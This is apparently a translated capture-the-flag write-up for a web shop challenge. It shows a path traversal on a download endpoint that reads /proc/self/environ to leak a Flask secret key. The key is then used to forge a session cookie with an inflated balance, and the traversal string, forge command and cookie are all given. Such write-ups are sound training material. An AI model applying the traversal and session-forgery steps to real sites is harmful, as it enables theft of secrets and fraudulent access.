- File reading and session forgery
- Found that the money to buy the flag is 1 yuan
In fact, this is probably the case. We are so close to what we want to get. If we can't buy the flag, we can buy honey... Go
to the topic
- Click to download our sweet images
- Probably the starting point of the topic is to grab a package when downloading
- Found
/download?image=2.jpg, found the download directory, we can try to get other useful information
- Can read other useful information
- Yesterday when I did the question, I did a file under Linux
- Review
The /proc directory under Linux
/proc directory usually stores various information about the dynamic running of the process. It is essentially a virtual directory.
If you want to view the information of the current process, the pid can be brute-forced. If you want to view the current process, only Need to replace /proc/[pid] with /proc/self
/proc/[pid]/cmdline: cmdline can read more sensitive information [pid] points to the terminal command corresponding to the process
/proc/[pid]/cwd/ : Cannot get the directory where the current application is located, you can jump to the current directory directly through the cwd command [pid] points to the running directory of the process
/proc/[pid]/environ: get the environment variables when the current program is running
- Read it
../../../../../../../proc/self/environ
- Found
SECRET_KEY:CvwtBWoKZf7xLLUHA0stdWBChIOQSYgnqNRKKMuu - Here you can think of session forgery
- Decrypt the session first
- To construct a new session
python3 flask_session_cookie_manager3.py encode -s "CvwtBWoKZf7xLLUHA0stdWBChIOQSYgnqNRKKMuu" -t "{'balance':99999}"
- payload:
eyJiYWxhbmNlIjo5OTk5OX0.YFCC5w.BVnnOhpjzJZaXC39jKtATtUZsSU - Modify session in the browser
You finally have enough money to buy the things you like, but are the things you like still available?
Doing the question makes me depressed! !
- I encountered some problems when running flask_session_cookie_manager3.py
- Wrote an article to CTFer who encountered the same problem
- The script still cannot run after installing the template in PIP